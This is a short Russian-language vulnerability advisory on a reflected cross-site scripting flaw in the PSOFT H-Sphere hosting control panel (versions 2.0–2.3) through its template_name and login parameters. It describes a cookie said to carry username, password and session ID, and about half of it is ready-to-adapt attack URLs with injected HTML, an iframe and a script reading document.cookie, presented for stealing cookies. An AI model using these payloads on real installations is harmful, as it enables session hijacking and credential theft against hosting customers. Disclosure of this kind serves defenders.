Продутк : PSOFT H-Sphere ( Hosting Control Panel )
Уязвимые Версии :2.3.x, 2.2.x, 2.1.x, 2.0.x
Описание:
Система, которая добавляет HTML файлы, содержит
уязвимость. Если страница не существует, система
печатает Error:
Unknown template : '[ПУТЬ К НЕСЩЕСТВУЮЩЕЙ СТРАНИЦЕ]'
при помощи этого вы можете вставлять хтмл или скрипт код вот так:
http://[ЖЕРТВА]/[ПУТЬ К PSOFT H-SPHERE INSTALLATION] /servlet/psoft.hsphere.CP/ [СУЩЕСТВУЮЩИЙ И ЗАЛОГИНИНЫЙ ЮЗЕР]/
[ID]/[ПУТЬ К H-SPHERE ЮЕЗРСКОМУ СКРИПТУ]/ servlet/psoft.hsphere.CP?
template_name=[ЗДЕСЬ ИДЕТ ВАШ КОД]
Новый Error выдаст:
Unknown template : '[ЗДЕСЬ ИДЕТ ВАШ КОД]'
И веб навигатор юзера выпонит любой код находящий на этой странице. Например для кражи кукисов:
MACTOKEN=[USER]|0000000xxxxxx| 0xxxxx0000xxxx0000xxxx0000xxxx00 ESTRUCTURE OF H-SPHERE COOKIE :
MACTOKEN=[USERNAME] | [ USER PASSWORD ] | [ USER SESSION ID ]
Примеры Атак:
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP? action=login&ftemplate=[MORE CODE AND
XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE <a%20href="https://xakep.ru/wp-content/uploads/post/18808/&login=[USERNAME]&
password=[PASSWORD]
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/ psoft.hsphere.CP?template
_name=<H1>xss</H1>
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/ [USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<IFRAME>
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP /[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<h1>XSS
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/ [USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<script>alert(document.cookie);</script>
